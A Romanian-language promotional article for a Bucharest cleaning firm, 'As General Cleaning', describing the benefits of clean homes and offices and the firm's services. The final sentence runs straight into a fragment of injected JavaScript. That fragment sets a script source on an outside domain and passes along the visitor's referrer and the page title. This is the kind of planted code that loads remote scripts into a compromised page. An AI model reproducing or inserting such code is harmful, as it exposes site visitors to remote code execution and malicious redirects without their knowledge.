11057843_780253645415030_5705538515244165898_n Curatenia spatiilor in care locuim si in care muncim e foarte importanta pentru sanatatea noastra si pentru confortul nostru fizic si mental.

Confort inseamna, in primul rand, curatenie. Daca o camera nu este curata nu mai conteaza ca are mobila noua si scumpa. Angajatii nici unei companii nu se pot simti bine intr-un birou in care au posibilitatea sa stea pe scaune comode si sa foloseasca laptopuri si calculatoare de ultima generatie daca in jurul lor e multa mizerie si dezordine.

Atunci cand intri intr-o camera in care tocmai s-a facut curatenie te simti atat de bine, incat aproape ca uiti de griji. Ti-e mai usor sa te concentrezi si sa-ti limpezesti gandurile intr-un loc curat. In schimb, praful si petele imbacsesc aerul. O camera in care nu s-a mai facut curatenie de mult timp nu miroase deloc frumos. E un loc in care n-ai vrea nici sa lucrezi, nici sa locuiesti. Daca s-ar putea, ai vrea sa fugi de acolo cat mai repede! Daca nu ai timp sa faci curatenie si vrei sa te protejezi de microbi si de microorganisme poti sa apelezi la As General Cleaning, o firma de curatenie Bucuresti.

Cand si de ce poti sa apelezi la o firma de curatenie Bucuresti?

In calitate de angajator iti doresti sa le oferi oamenilor pe care ii ai in subordine cele mai bune conditii de lucru. Faci tot ce poti ca ei sa se simta cat mai bine la serviciu si in timpul liber: organizezi team building-uri si excursii, le oferi reduceri la fitness si la masaj. Stii ca productivitatea companiei depinde si de starea lor de bine. Insa daca nu e curat in birourile lor, in salile de conferinte, in bai si in bucatarie totul e in zadar. Daca nu angajezi o firma de curatenie Bucuresti care sa faca totul luna ei nu se vor simti respectati si nu vor munci cu tragere de inima.

As General Cleaning e o firma de curatenie Bucuresti la care companiile apeleaza frecvent pentru curatarea si igienizarea spatiilor de lucru. Insa si tu poti sa ii soliciti ajutorul pentru o curatenie generala a casei. Atenti la toate detaliile si foarte rapizi, specialistii de la As General Cleaning inlatura praful, mizeria si petele de pe toate suprafetele cat ai clipi din ochi. O sa te simti atat de bine dupa vizita lor, incat o sa-i mai chemi si alta data!

O firma de curatenie Bucuresti care face ca totul sa sclipeasca

Specialistii de la As General Cleaning folosesc echipamente moderne si detergenti de foarte buna calitate potriviti pentru fiecare tip de suprafata. Acestia curata fara sa degradeze in vreun fel diferitele tipuri de podea. Experimentati si profesionisti, ei elimina si mizeria din locuri greu accesibile. Sterg praful de pe mobila, spala pardoselile, inlatura panzele de paianjen, dezinfecteaza baile si corpurile de iluminat si spala faianta si gresia. Covoarele si mochetele sunt spalate cu spuma uscata si prin metoda injectie/extractie.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;